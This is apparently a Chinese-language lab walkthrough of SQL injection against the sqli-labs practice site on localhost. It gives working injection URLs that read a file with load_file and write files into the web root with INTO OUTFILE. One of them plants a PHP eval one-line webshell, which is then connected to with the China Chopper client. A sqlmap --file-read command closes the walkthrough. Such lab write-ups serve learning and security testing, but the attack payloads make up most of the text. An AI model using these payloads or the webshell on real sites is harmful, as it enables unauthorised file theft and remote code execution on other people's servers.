sql 上传文件 下载文件 一句话木马+菜刀 sqlmap

这里说的内容可能比较多  但是都需要  高的权限 能够 创建删除 文件~~~~   然后

先说一下 下载文件吧  

  我们构造的链接是

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=0' union select 1,load_file("D:\\flag.txt"),3 --+

然后  我们的内容 如下 

 

可以看出  flag 已经被我们输入到网址里面了   然后 

我们说 上传文件 

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1'))  union select  1 , '<?php phpinfo();?>' , 3   into  outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\sqli-labs-master\\Less-7\\1.php"  --+

然后 文件中就写入了  

1    <?php phpinfo();?>    3  

然后 我们经过服务器 运行之后 就会发现   <?php phpinfo();?> 成功运行 

 显示出了php的信息等  

然后   就是用一句话木马 和 菜刀连接了

<?php @eval($_POST['pass']);?>

用 

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1'))  union select  1 , "<?php @eval($_POST['pass']);?>" , 3   into  outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\sqli-labs-master\\Less-7\\4.php"  --+

然后  再用菜刀连接 

 如图  搞定成功  

下面就是用sqlmap  来 确定  搞一波

 

py -2  sqlmap.py -u  "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=1" --file-read "D:\\FLAG.txt" --batch

 

 

 

 找到那个文件夹 

 然后找到原本的文件 

一样一样的~~~~~~~~~~~~~~~